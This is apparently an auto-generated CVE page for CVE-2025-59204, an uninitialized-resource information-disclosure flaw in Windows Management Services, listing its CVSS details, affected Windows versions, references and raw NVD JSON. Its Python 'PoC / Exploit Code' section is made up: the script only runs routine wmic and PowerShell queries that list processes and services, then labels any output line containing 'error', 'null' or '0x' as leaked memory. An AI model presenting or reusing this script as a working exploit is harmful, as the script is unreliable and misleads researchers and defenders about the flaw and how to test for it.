CVE-2025-59204

Description

Use of uninitialized resource in Windows Management Services allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:* - VULNERABLE

Microsoft Windows 10 (各版本)

Microsoft Windows 11 (各版本)

Microsoft Windows Server 2019

Microsoft Windows Server 2022

Microsoft Windows Server 2025

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59204 - Windows Management Services Uninitialized Resource Information Disclosure
# This PoC demonstrates triggering the uninitialized resource vulnerability
# in Windows Management Services to leak memory contents.

import subprocess
import sys

def trigger_wms_vulnerability():
    """
    Trigger the uninitialized resource vulnerability in Windows Management Services.
    The vulnerability occurs when WMS processes certain requests without properly
    initializing memory resources, leading to information disclosure.
    """
    print("[*] CVE-2025-59204 PoC - Windows Management Services Info Disclosure")
    print("[*] Attempting to trigger uninitialized resource read in WMS...\n")

    # Method 1: Using wmic to trigger WMS code path with uninitialized memory
    commands = [
        # Trigger WMI service which interacts with Windows Management Services
        ['wmic', 'process', 'where', 'name="winlogon.exe"', 'get', 'processid,name'],
        # Trigger service management path
        ['wmic', 'service', 'where', 'state="running"', 'get', 'name,displayname,startname'],
        # Attempt to read potentially uninitialized memory via service configuration
        ['powershell', '-Command', 'Get-WmiObject -Class Win32_Service | Select-Object -First 5 | Format-List *'],
    ]

    for cmd in commands:
        try:
            print(f"[+] Executing: {' '.join(cmd)}")
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
            output = result.stdout + result.stderr

            # Check for potential uninitialized memory patterns
            # Uninitialized memory may contain random data patterns
            if output:
                print(f"[+] Output received ({len(output)} bytes)")
                # Look for anomalous data that might indicate uninitialized memory
                lines = output.split('\n')
                for line in lines:
                    if any(pattern in line.lower() for pattern in ['error', 'null', 'undefined', '0x']):
                        print(f"[!] Potential uninitialized data: {line.strip()}")
            print()
        except subprocess.TimeoutExpired:
            print("[-] Command timed out\n")
        except Exception as e:
            print(f"[-] Error: {e}\n")

    print("[*] PoC execution completed.")
    print("[*] Note: Actual exploitation requires local low-privilege access.")

if __name__ == "__main__":
    if sys.platform != 'win32':
        print("[-] This PoC requires Windows OS")
        sys.exit(1)
    trigger_wms_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59204
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59204
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59204/
[4] VulDB https://vuldb.com/cve/CVE-2025-59204
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59204

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59204", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:00.253", "lastModified": "2025-10-17T15:26:37.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of uninitialized resource in Windows Management Services allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "E216CD5B-8885-4E17-8718-97E88A724A44"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "36E44227-0320-43B1-A0D9-EB28B25CDB4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.22631.6060", "matchCriteriaId": "4AF873E4-B2FE-4504-BFF0-FC71121FC9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59204", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}